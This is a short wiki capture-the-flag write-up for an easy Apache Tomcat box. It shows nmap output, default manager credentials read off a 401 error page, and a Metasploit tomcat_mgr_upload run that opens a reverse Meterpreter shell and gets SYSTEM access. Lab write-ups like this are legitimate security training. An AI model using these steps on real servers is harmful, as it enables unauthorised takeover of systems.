No edit summary Tag: Reverted |
No edit summary |
||
(One intermediate revision by the same user not shown) | |||
Line 1: | Line 1: | ||
[[Category | [[Category:Easy]] | ||
<syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 17:44 MST | <syntaxhighlight lang="bash">Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 17:44 MST | ||
Nmap scan report for 10.129.30.107 | Nmap scan report for 10.129.30.107 |
Latest revision as of 00:03, 21 January 2023
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 17:44 MST
Nmap scan report for 10.129.30.107
Host is up (0.055s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
Click around get a 401 error. But it gives creds...
# 401 Unauthorized
You are not authorized to view this page. If you have not changed any configuration files, please examine the file conf/tomcat-users.xml in your installation. That file must contain the credentials to let you use this webapp.
For example, to add the manager-gui role to a user named tomcat with a password of s3cret, add the following to the config file listed above.
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
/manager
creds work! Lets run msfconsole
to try to get a shell.
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.10.16.18:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying 7ZKrlUtgk...
[*] Executing 7ZKrlUtgk...
[*] Sending stage (58851 bytes) to 10.129.30.107
[*] Undeploying 7ZKrlUtgk ...
[*] Undeployed at /manager/html/undeploy
[*] Meterpreter session 1 opened (10.10.16.18:4444 -> 10.129.30.107:49192) at 2022-12-16 18:01:49 -0700
meterpreter > shell
Process 1 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\sys
Works!